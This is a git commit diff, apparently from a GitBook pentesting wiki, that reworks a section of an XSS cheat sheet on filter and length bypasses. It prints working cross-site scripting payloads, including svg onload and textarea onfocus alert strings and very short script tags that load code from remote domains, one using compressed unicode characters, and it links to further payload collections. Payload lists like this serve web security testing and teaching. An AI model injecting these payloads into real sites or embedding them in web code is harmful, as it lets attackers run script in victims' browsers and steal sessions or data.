GitBook: [#3020] No subject
This commit is contained in:
parent
15ca21d79a
commit
5b391bbae7
|
@ -170,11 +170,14 @@ onerror=alert`1`
|
|||
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
|
||||
```
|
||||
|
||||
### Length bypass (XSS in 20chars)
|
||||
### Length bypass (small XSSs)
|
||||
|
||||
Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30/XSS\_20\_characters.html).
|
||||
{% hint style="info" %}
|
||||
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
|
||||
{% endhint %}
|
||||
|
||||
```javascript
|
||||
```html
|
||||
<!-- Taken from the blog of Jorge Lajara -->
|
||||
<svg/onload=alert``>
|
||||
<script src=//aa.es>
|
||||
<script src=//℡㏛.pw>
|
||||
|
@ -182,8 +185,7 @@ Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30
|
|||
|
||||
The last one is using 2 unicode characters which expands to 5: telsr\
|
||||
More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
|
||||
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).\
|
||||
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
|
||||
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).
|
||||
|
||||
### Click XSS - Clickjacking
|
||||
|
||||
|
|
Loading…
Reference in New Issue